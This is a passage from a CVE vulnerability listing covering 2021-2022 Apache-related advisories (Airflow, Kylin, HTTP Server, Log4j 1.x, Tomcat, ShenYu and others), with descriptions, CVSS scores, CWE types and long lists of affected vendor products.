oracle communications_convergence 3.0.2.2.0
oracle communications_unified_inventory_management 7.4.2
sonicwall email_security *
oracle retail_eftlink 20.0.1
oracle primavera_gateway *
oracle banking_trade_finance 14.5
oracle agile_plm 9.3.6
oracle communications_cloud_native_core_security_edge_protection_proxy 1.7.0
oracle hyperion_tax_provision *
oracle health_sciences_empirica_signal 9.1.0.6
oracle siebel_ui_framework *
oracle retail_integration_bus 14.1.3
oracle communications_services_gatekeeper 7.0
oracle communications_cloud_native_core_network_function_cloud_native_environment 1.10.0
oracle retail_eftlink 17.0.2
oracle retail_price_management 14.0.4
oracle hospitality_suite8 8.14.0
oracle communications_network_charging_and_control 6.0.1.0.0
oracle communications_cloud_native_core_network_slice_selection_function 1.8.0
oracle insurance_insbridge_rating_and_underwriting *
oracle primavera_unifier 19.12
oracle banking_deposits_and_lines_of_credit_servicing 2.12.0
oracle sql_developer *
oracle communications_cloud_native_core_policy 1.15.0
oracle communications_interactive_session_recorder 6.4
oracle retail_store_inventory_management 14.0.4.13
oracle retail_data_extractor_for_merchandising 16.0.2
sonicwall 6bk1602-0aa52-0tp0_firmware *
oracle banking_platform 2.7.1
oracle communications_eagle_ftp_table_base_retrieval 4.5
oracle webcenter_sites 12.2.1.4.0
oracle communications_cloud_native_core_service_communication_proxy 1.15.0
oracle retail_store_inventory_management 15.0.3.3
oracle financial_services_analytical_applications_infrastructure *
oracle flexcube_universal_banking *
debian debian_linux 10.0
oracle retail_integration_bus *
oracle banking_party_management 2.7.0
oracle retail_customer_insights 15.0.2
oracle retail_eftlink 21.0.0
oracle financial_services_model_management_and_governance 8.0.8.0.0
oracle utilities_framework *
oracle health_sciences_inform 7.0.0.0
oracle primavera_gateway 21.12.0
oracle weblogic_server 12.2.1.4.0
oracle retail_data_extractor_for_merchandising 15.0.2
oracle retail_order_broker 16.0
oracle retail_service_backbone 14.1.3.2
oracle retail_price_management 13.2
oracle retail_order_broker 18.0
oracle retail_store_inventory_management 16.0.3.7
oracle retail_eftlink 19.0.1
oracle communications_cloud_native_core_network_repository_function 1.15.1
oracle managed_file_transfer 12.2.1.4.0
oracle enterprise_manager_ops_center 12.4.0.0
oracle utilities_framework 4.4.0.0.0
oracle retail_central_office 14.1
oracle financial_services_model_management_and_governance 8.1.1.0.0
oracle communications_interactive_session_recorder 6.3
oracle retail_predictive_application_server 14.1.3.46
oracle instantis_enterprisetrack 17.3
oracle weblogic_server 12.2.1.3.0
oracle identity_management_suite 12.2.1.3.0
oracle taleo_platform *
oracle banking_payments 14.5
oracle webcenter_portal 12.2.1.3.0
oracle communications_convergent_charging_controller 6.0.1.0.0
oracle enterprise_manager_for_peoplesoft 13.4.1.1
oracle banking_loans_servicing 2.12.0
sonicwall 6bk1602-0aa12-0tp0_firmware *
oracle retail_invoice_matching 16.0.3
oracle communications_cloud_native_core_network_repository_function 1.15.0
oracle banking_treasury_management 14.5
oracle financial_services_model_management_and_governance 8.1.0.0.0
oracle communications_evolved_communications_application_server 7.1
oracle webcenter_sites 12.2.1.3.0
oracle hospitality_token_proxy_service 19.2
oracle retail_back_office 14.1
oracle communications_billing_and_revenue_management 12.0.0.5
oracle retail_integration_bus 14.1.3.2
oracle communications_diameter_signaling_router *
oracle communications_eagle_element_management_system 46.6
oracle hyperion_data_relationship_management *
oracle enterprise_manager_for_peoplesoft 13.5.1.1
oracle business_intelligence 5.5.0.0.0
oracle primavera_unifier 21.12
oracle health_sciences_information_manager *
oracle retail_financial_integration 19.0.1
oracle communications_billing_and_revenue_management 12.0.0.4
debian debian_linux 11.0
oracle retail_financial_integration 19.0.0
oracle retail_store_inventory_management 14.1.3.14
oracle communications_ip_service_activator 7.4.0
oracle instantis_enterprisetrack 17.2
oracle communications_messaging_server 8.1
oracle hyperion_profitability_and_cost_management *
oracle jdeveloper 12.2.1.4.0
oracle retail_integration_bus 19.0.0
oracle communications_cloud_native_core_console 1.9.0
oracle retail_eftlink 16.0.3
oracle banking_enterprise_default_management 2.7.1
oracle data_integrator 12.2.1.4.0
oracle primavera_p6_enterprise_project_portfolio_management *
oracle retail_merchandising_system 16.0.3
oracle retail_service_backbone 19.0.1
oracle healthcare_master_person_index 5.0.1
oracle insurance_insbridge_rating_and_underwriting 5.6.1.0
oracle agile_plm_mcad_connector 3.6
oracle primavera_unifier 18.8
oracle retail_price_management 14.1.3.0
oracle communications_user_data_repository 12.4
oracle webcenter_portal 12.2.1.4.0
oracle communications_convergence 3.0.3.0
oracle healthcare_translational_research 4.1.0
oracle payment_interface 19.1
oracle communications_asap 7.3
oracle retail_order_broker 19.1
oracle hyperion_bi+ *
oracle managed_file_transfer 12.2.1.3.0
oracle retail_service_backbone 19.0.0
oracle autovue_for_agile_product_lifecycle_management 21.0.2
oracle hyperion_planning *
oracle utilities_framework 4.4.0.2.0
oracle retail_financial_integration 14.1.3.2
oracle banking_enterprise_default_management 2.12.0
oracle flexcube_universal_banking 14.5
oracle communications_unified_inventory_management 7.4.1
sonicwall 6bk1602-0aa22-0tp0_firmware *
oracle e-business_suite 12.2
oracle healthcare_translational_research 4.1.1
oracle peoplesoft_enterprise_peopletools 8.58
oracle retail_financial_integration 15.0.3.1
oracle mysql_enterprise_monitor *
oracle retail_predictive_application_server 15.0.3.115
oracle payment_interface 20.3
oracle communications_service_broker 6.2
oracle communications_network_integrity 7.3.6
oracle identity_manager_connector 9.1.0
oracle management_cloud_engine 1.5.0
sonicwall network_security_manager *
oracle flexcube_universal_banking 11.83.3
oracle retail_eftlink 18.0.1
oracle retail_point-of-service 14.1
oracle health_sciences_inform 6.3.2.1
netapp cloud_manager -
oracle data_integrator 12.2.1.3.0
CVE-2021-45229 MEDIUM

It was discovered that the "Trigger DAG with config" screen was susceptible to XSS attacks via the `origin` query argument. This issue affects Apache Airflow versions 2.2.3 and below.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,CWE-79,

Products Affected

Vendor Product Version
apache airflow *
CVE-2021-45230 MEDIUM

In Apache Airflow prior to 2.2.0. This CVE applies to a specific case where a User who has "can_create" permissions on DAG Runs can create Dag Runs for dags that they don't have "edit" permissions for.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache airflow *
CVE-2021-45232 HIGH

In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin`, all APIs and authentication middleware are developed based on framework `droplet`, but some API directly use the interface of framework `gin` thus bypassing the authentication.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-306,CWE-306,

Products Affected

Vendor Product Version
apache apisix_dashboard *
CVE-2021-45456 HIGH

Apache kylin checks the legitimacy of the project before executing some commands with the project name passed in by the user. There is a mismatch between what is being checked and what is being used as the shell command argument in DiagnosisService. This may cause an illegal project name to pass the check and perform the following steps, resulting in a command injection vulnerability. This issue affects Apache Kylin 4.0.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-77,

Products Affected

Vendor Product Version
apache kylin 4.0.0
CVE-2021-45457 MEDIUM

In Apache Kylin, Cross-origin requests with credentials are allowed to be sent from any origin. This issue affects Apache Kylin 2 version 2.6.6 and prior versions; Apache Kylin 3 version 3.1.2 and prior versions; Apache Kylin 4 version 4.0.0 and prior versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-863,

Products Affected

Vendor Product Version
apache kylin 4.0.0
apache kylin *
CVE-2021-45458 MEDIUM

Apache Kylin provides encryption classes PasswordPlaceholderConfigurer to help users encrypt their passwords. In the encryption algorithm used by this encryption class, the cipher is initialized with a hardcoded key and IV. If users use class PasswordPlaceholderConfigurer to encrypt their password and configure it into kylin's configuration file, there is a risk that the password may be decrypted. This issue affects Apache Kylin 2 version 2.6.6 and prior versions; Apache Kylin 3 version 3.1.2 and prior versions; Apache Kylin 4 version 4.0.0 and prior versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-798,CWE-330,CWE-798,

Products Affected

Vendor Product Version
apache kylin 4.0.0
apache kylin *
CVE-2022-22719 MEDIUM

A carefully crafted request body can cause a read to a random memory area which could cause the process to crash. This issue affects Apache HTTP Server 2.4.52 and earlier.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-665,CWE-665,

Products Affected

Vendor Product Version
fedoraproject fedora 35
apache http_server *
fedoraproject fedora 34
oracle http_server 12.2.1.3.0
oracle http_server 12.2.1.4.0
debian debian_linux 9.0
apple macos *
oracle zfs_storage_appliance_kit 8.8
fedoraproject fedora 36
apple mac_os_x 10.15.7
CVE-2022-22720 HIGH

Apache HTTP Server 2.4.52 and earlier fails to close inbound connection when errors are encountered discarding the request body, exposing the server to HTTP Request Smuggling

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-444,CWE-444,

Products Affected

Vendor Product Version
fedoraproject fedora 35
apache http_server *
fedoraproject fedora 34
oracle http_server 12.2.1.3.0
oracle http_server 12.2.1.4.0
debian debian_linux 9.0
apple macos *
oracle zfs_storage_appliance_kit 8.8
fedoraproject fedora 36
apple mac_os_x 10.15.7
oracle enterprise_manager_ops_center 12.4.0.0
CVE-2022-22721 MEDIUM

If LimitXMLRequestBody is set to allow request bodies larger than 350MB (defaults to 1M) on 32 bit systems an integer overflow happens which later causes out of bounds writes. This issue affects Apache HTTP Server 2.4.52 and earlier.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H 3.9 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-190,CWE-190,

Products Affected

Vendor Product Version
apache http_server *
apple mac_os_x *
oracle http_server 12.2.1.3.0
oracle http_server 12.2.1.4.0
debian debian_linux 9.0
apple macos *
oracle enterprise_manager_ops_center 12.4.0.0
fedoraproject fedora 35
fedoraproject fedora 34
oracle zfs_storage_appliance_kit 8.8
fedoraproject fedora 36
apple mac_os_x 10.15.7
CVE-2022-22728

A flaw in Apache libapreq2 versions 2.16 and earlier could cause a buffer overflow while processing multipart form uploads. A remote attacker could send a request causing a process crash which could lead to a denial of service attack.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
fedoraproject fedora 35
fedoraproject fedora 37
apache libapreq2 *
fedoraproject fedora 36
debian debian_linux 10.0
CVE-2022-22733 MEDIUM

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache ShardingSphere ElasticJob-UI allows an attacker who has guest account to do privilege escalation. This issue affects Apache ShardingSphere ElasticJob-UI Apache ShardingSphere ElasticJob-UI 3.x version 3.0.0 and prior versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,CWE-200,

Products Affected

Vendor Product Version
apache shardingsphere_elasticjob-ui 3.0.0
CVE-2022-22931 MEDIUM

Fix of CVE-2021-40525 do not prepend delimiters upon valid directory validations. Affected implementations include: - maildir mailbox store - Sieve file repository This enables a user to access other users data stores (limited to user names being prefixed by the value of the username being used).

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,CWE-22,

Products Affected

Vendor Product Version
apache james 3.6.1
CVE-2022-22932 MEDIUM

Apache Karaf obr:* commands and run goal on the karaf-maven-plugin have partial path traversal which allows to break out of expected folder. The risk is low as obr:* commands are not very used and the entry is set by user. This has been fixed in revision: https://gitbox.apache.org/repos/asf?p=karaf.git;h=36a2bc4 https://gitbox.apache.org/repos/asf?p=karaf.git;h=52b70cf Mitigation: Apache Karaf users should upgrade to 4.2.15 or 4.3.6 or later as soon as possible, or use correct path. JIRA Tickets: https://issues.apache.org/jira/browse/KARAF-7326

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache karaf *
CVE-2022-23181 LOW

The fix for bug CVE-2020-9484 introduced a time of check, time of use vulnerability into Apache Tomcat 10.1.0-M1 to 10.1.0-M8, 10.0.0-M5 to 10.0.14, 9.0.35 to 9.0.56 and 8.5.55 to 8.5.73 that allowed a local attacker to perform actions with the privileges of the user that the Tomcat process is using. This issue is only exploitable when Tomcat is configured to persist sessions using the FileStore.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.0 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H 1.0 5.9

CVSS 2.0

Severity: LOW

Problem Type: CWE-367,CWE-367,

Products Affected

Vendor Product Version
apache tomcat 10.1.0
oracle financial_services_crime_and_compliance_management_studio 8.0.8.2.0
apache tomcat 10.0.0
oracle agile_engineering_data_management 6.2.1.0
debian debian_linux 10.0
oracle managed_file_transfer 12.2.1.4.0
debian debian_linux 11.0
oracle financial_services_crime_and_compliance_management_studio 8.0.8.3.0
apache tomcat *
oracle communications_cloud_native_core_policy 1.15.0
oracle managed_file_transfer 12.2.1.3.0
oracle mysql_enterprise_monitor *
CVE-2022-23206 MEDIUM

In Apache Traffic Control Traffic Ops prior to 6.1.0 or 5.1.6, an unprivileged user who can reach Traffic Ops over HTTPS can send a specially-crafted POST request to /user/login/oauth to scan a port of a server that Traffic Ops can reach.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-918,CWE-918,

Products Affected

Vendor Product Version
apache traffic_control *
CVE-2022-23223 MEDIUM

On Apache ShenYu versions 2.4.0 and 2.4.1, and endpoint existed that disclosed the passwords of all users. Users are recommended to upgrade to version 2.4.2 or later.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-522,CWE-522,

Products Affected

Vendor Product Version
apache shenyu 2.4.0
apache shenyu 2.4.1
CVE-2022-23302 MEDIUM

JMSSink in all versions of Log4j 1.x is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration or if the configuration references an LDAP service the attacker has access to. The attacker can provide a TopicConnectionFactoryBindingName configuration causing JMSSink to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-4104. Note this issue only affects Log4j 1.x when specifically configured to use JMSSink, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-502,CWE-502,

Products Affected

Vendor Product Version
oracle business_process_management_suite 12.2.1.3.0
oracle enterprise_manager_base_platform 13.4.0.0
oracle advanced_supply_chain_planning 12.1
oracle communications_unified_inventory_management 7.4.2
oracle tuxedo 12.2.2.0.0
oracle e-business_suite_cloud_manager_and_cloud_backup_module 2.2.1.1.1
oracle hyperion_infrastructure_technology *
apache log4j *
oracle communications_instant_messaging_server 10.0.1.5.0
oracle enterprise_manager_base_platform 13.5.0.0
oracle communications_unified_inventory_management 7.4.1
oracle hyperion_data_relationship_management *
oracle business_intelligence 12.2.1.4.0
qos reload4j *
oracle financial_services_revenue_management_and_billing_analytics 2.8.0.0
oracle mysql_enterprise_monitor *
netapp snapmanager -
oracle weblogic_server 12.2.1.4.0
oracle business_intelligence 5.9.0.0.0
oracle identity_management_suite 12.2.1.4.0
oracle jdeveloper 12.2.1.3.0
oracle business_intelligence 12.2.1.3.0
oracle communications_offline_mediation_controller *
oracle weblogic_server 12.2.1.3.0
oracle financial_services_revenue_management_and_billing_analytics 2.7.0.1
oracle identity_management_suite 12.2.1.3.0
oracle communications_network_integrity 7.3.6
oracle e-business_suite_cloud_manager_and_cloud_backup_module *
oracle healthcare_foundation 8.1.0
oracle middleware_common_libraries_and_tools 12.2.1.4.0
oracle financial_services_revenue_management_and_billing_analytics 2.7.0.0
broadcom brocade_sannav -
oracle communications_offline_mediation_controller 12.0.0.5.0
oracle business_process_management_suite 12.2.1.4.0
oracle advanced_supply_chain_planning 12.2
oracle weblogic_server 14.1.1.0.0
oracle communications_messaging_server 8.1
oracle communications_eagle_ftp_table_base_retrieval 4.5
oracle identity_manager_connector 11.1.1.5.0
CVE-2022-23305 MEDIUM

By design, the JDBCAppender in Log4j 1.2.x accepts an SQL statement as a configuration parameter where the values to be inserted are converters from PatternLayout. The message converter, %m, is likely to always be included. This allows attackers to manipulate the SQL by entering crafted strings into input fields or headers of an application that are logged allowing unintended SQL queries to be executed. Note this issue only affects Log4j 1.x when specifically configured to use the JDBCAppender, which is not the default. Beginning in version 2.0-beta8, the JDBCAppender was re-introduced with proper support for parameterized SQL queries and further customization over the columns written to in logs. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-89,CWE-89,

Products Affected

Vendor Product Version
oracle business_process_management_suite 12.2.1.3.0
oracle enterprise_manager_base_platform 13.4.0.0
oracle advanced_supply_chain_planning 12.1
oracle communications_unified_inventory_management 7.4.2
oracle tuxedo 12.2.2.0.0
oracle e-business_suite_cloud_manager_and_cloud_backup_module 2.2.1.1.1
oracle hyperion_infrastructure_technology *
apache log4j *
oracle communications_instant_messaging_server 10.0.1.5.0
oracle enterprise_manager_base_platform 13.5.0.0
oracle communications_unified_inventory_management 7.4.1
oracle hyperion_data_relationship_management *
oracle business_intelligence 12.2.1.4.0
qos reload4j *
oracle financial_services_revenue_management_and_billing_analytics 2.8.0.0
oracle mysql_enterprise_monitor *
netapp snapmanager -
oracle weblogic_server 12.2.1.4.0
oracle business_intelligence 5.9.0.0.0
oracle identity_management_suite 12.2.1.4.0
oracle jdeveloper 12.2.1.3.0
oracle business_intelligence 12.2.1.3.0
oracle communications_offline_mediation_controller *
oracle weblogic_server 12.2.1.3.0
oracle financial_services_revenue_management_and_billing_analytics 2.7.0.1
oracle identity_management_suite 12.2.1.3.0
oracle communications_network_integrity 7.3.6
oracle retail_extract_transform_and_load 13.2.5
oracle e-business_suite_cloud_manager_and_cloud_backup_module *
oracle healthcare_foundation 8.1.0
oracle middleware_common_libraries_and_tools 12.2.1.4.0
oracle financial_services_revenue_management_and_billing_analytics 2.7.0.0
broadcom brocade_sannav -
oracle communications_offline_mediation_controller 12.0.0.5.0
oracle business_process_management_suite 12.2.1.4.0
oracle advanced_supply_chain_planning 12.2
oracle weblogic_server 14.1.1.0.0
oracle communications_messaging_server 8.1
oracle e-business_suite_information_discovery *
oracle communications_eagle_ftp_table_base_retrieval 4.5
oracle identity_manager_connector 11.1.1.5.0
CVE-2022-23307 HIGH

CVE-2020-9493 identified a deserialization issue that was present in Apache Chainsaw. Prior to Chainsaw V2.0 Chainsaw was a component of Apache Log4j 1.2.x where the same issue exists.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,CWE-502,

Products Affected

Vendor Product Version
oracle business_process_management_suite 12.2.1.3.0
oracle enterprise_manager_base_platform 13.4.0.0
oracle advanced_supply_chain_planning 12.1
oracle communications_unified_inventory_management 7.4.2
oracle tuxedo 12.2.2.0.0
oracle e-business_suite_cloud_manager_and_cloud_backup_module 2.2.1.1.1
oracle hyperion_infrastructure_technology *
apache log4j *
oracle communications_instant_messaging_server 10.0.1.5.0
oracle enterprise_manager_base_platform 13.5.0.0
oracle communications_unified_inventory_management 7.4.1
oracle hyperion_data_relationship_management *
oracle business_intelligence 12.2.1.4.0
qos reload4j *
oracle financial_services_revenue_management_and_billing_analytics 2.8.0.0
oracle mysql_enterprise_monitor *
oracle weblogic_server 12.2.1.4.0
oracle business_intelligence 5.9.0.0.0
oracle identity_management_suite 12.2.1.4.0
oracle jdeveloper 12.2.1.3.0
oracle business_intelligence 12.2.1.3.0
oracle communications_offline_mediation_controller *
oracle weblogic_server 12.2.1.3.0
oracle financial_services_revenue_management_and_billing_analytics 2.7.0.1
oracle identity_management_suite 12.2.1.3.0
apache chainsaw *
oracle communications_network_integrity 7.3.6
oracle retail_extract_transform_and_load 13.2.5
oracle e-business_suite_cloud_manager_and_cloud_backup_module *
oracle healthcare_foundation 8.1.0
oracle middleware_common_libraries_and_tools 12.2.1.4.0
oracle financial_services_revenue_management_and_billing_analytics 2.7.0.0
oracle communications_offline_mediation_controller 12.0.0.5.0
oracle business_process_management_suite 12.2.1.4.0
oracle advanced_supply_chain_planning 12.2
oracle weblogic_server 14.1.1.0.0
oracle communications_messaging_server 8.1
oracle communications_eagle_ftp_table_base_retrieval 4.5
oracle identity_manager_connector 11.1.1.5.0
CVE-2022-23437 HIGH

There's a vulnerability within the Apache Xerces Java (XercesJ) XML parser when handling specially crafted XML document payloads. This causes, the XercesJ XML parser to wait in an infinite loop, which may sometimes consume system resources for prolonged duration. This vulnerability is present within XercesJ version 2.12.1 and the previous versions.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-835,

Products Affected

Vendor Product Version
oracle peoplesoft_enterprise_peopletools 8.59
oracle financial_services_enterprise_case_management 8.0.7.1
oracle agile_engineering_data_management 6.2.1.0
oracle financial_services_enterprise_case_management 8.1.1.0
oracle financial_services_behavior_detection_platform *
oracle financial_services_crime_and_compliance_management_studio 8.0.8.3.0
oracle retail_bulk_data_integration 16.0.3.0
oracle primavera_gateway *
oracle retail_merchandising_system 16.0.3
apache xerces-j *
oracle agile_plm 9.3.6
oracle retail_integration_bus 15.0.3.1
oracle retail_service_backbone 19.0.1
oracle weblogic_server 12.2.1.3.0
oracle financial_services_enterprise_case_management 8.0.7.2.0
oracle retail_merchandising_system 19.0.1
oracle financial_services_behavior_detection_platform 8.1.2.0
oracle health_sciences_information_manager 3.0.0.1
oracle communications_asap 7.3
oracle retail_extract_transform_and_load 13.2.8
oracle retail_financial_integration 16.0.3
oracle financial_services_enterprise_case_management 8.0.8.1
oracle global_lifecycle_management_opatch *
oracle weblogic_server 14.1.1.0.0
oracle ilearning 6.3
oracle financial_services_behavior_detection_platform 8.1.1.1
oracle financial_services_enterprise_case_management 8.1.1.1
oracle financial_services_behavior_detection_platform 8.1.1.0
oracle retail_financial_integration 14.1.3.2
oracle retail_service_backbone 15.0.3.1
oracle communications_session_route_manager *
oracle ilearning 6.2
oracle financial_services_crime_and_compliance_management_studio 8.0.8.2.0
oracle retail_service_backbone 16.0.3
oracle financial_services_analytical_applications_infrastructure *
oracle retail_integration_bus 14.1.3.2
oracle banking_deposits_and_lines_of_credit_servicing 2.7
oracle banking_party_management 2.7.0
oracle communications_session_report_manager *
oracle retail_integration_bus 16.0.3
oracle peoplesoft_enterprise_peopletools 8.58
oracle retail_financial_integration 15.0.3.1
oracle weblogic_server 12.2.1.4.0
oracle communications_element_manager *
oracle product_lifecycle_analytics 3.6.1
oracle health_sciences_information_manager *
oracle retail_financial_integration 19.0.1
oracle flexcube_universal_banking 12.4.0
oracle global_lifecycle_management_nextgen_oui_framework *
netapp active_iq_unified_manager -
oracle retail_integration_bus 19.0.1
oracle global_lifecycle_management_nextgen_oui_framework 13.9.4.2.2
oracle retail_service_backbone 14.1.3.2
oracle financial_services_enterprise_case_management 8.0.8.0
CVE-2022-23913 MEDIUM

In Apache ActiveMQ Artemis prior to 2.20.0 or 2.19.1, an attacker could partially disrupt availability (DoS) through uncontrolled resource consumption of memory.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-770,CWE-770,

Products Affected

Vendor Product Version
netapp active_iq_unified_manager -
apache activemq_artemis *
netapp oncommand_workflow_automation -
CVE-2022-23942 MEDIUM

Apache Doris, prior to 1.0.0, used a hardcoded key and IV to initialize the cipher used for ldap password, which may lead to information disclosure.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-798,CWE-798,

Products Affected

Vendor Product Version
apache doris *
CVE-2022-23943 HIGH

Out-of-bounds Write vulnerability in mod_sed of Apache HTTP Server allows an attacker to overwrite heap memory with possibly attacker provided data. This issue affects Apache HTTP Server 2.4 version 2.4.52 and prior versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-190,CWE-787,CWE-787,

Products Affected

Vendor Product Version
fedoraproject fedora 35
apache http_server *
fedoraproject fedora 34
oracle http_server 12.2.1.3.0
oracle http_server 12.2.1.4.0
debian debian_linux 9.0
oracle zfs_storage_appliance_kit 8.8
fedoraproject fedora 36
CVE-2022-23944 MEDIUM

User can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 3.9 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-862,CWE-306,

Products Affected

Vendor Product Version
apache shenyu 2.4.0
apache shenyu 2.4.1
CVE-2022-23945 MEDIUM

Missing authentication on ShenYu Admin when register by HTTP. This issue affected Apache ShenYu 2.4.0 and 2.4.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-862,CWE-306,

Products Affected

Vendor Product Version
apache shenyu 2.4.0
apache shenyu 2.4.1
CVE-2022-23974 MEDIUM

In 0.9.3 or older versions of Apache Pinot segment upload path allowed segment directories to be imported into pinot tables. In pinot installations that allow open access to the controller a specially crafted request can potentially be exploited to cause disruption in pinot service. Pinot release 0.10.0 fixes this. See https://docs.pinot.apache.org/basics/releases/0.10.0

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-674,CWE-674,

Products Affected

Vendor Product Version
apache pinot *
CVE-2022-24070 MEDIUM

Subversion's mod_dav_svn is vulnerable to memory corruption. While looking up path-based authorization rules, mod_dav_svn servers may attempt to use memory which has already been freed. Affected Subversion mod_dav_svn servers 1.10.0 through 1.14.1 (inclusive). Servers that do not use mod_dav_svn are not affected.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

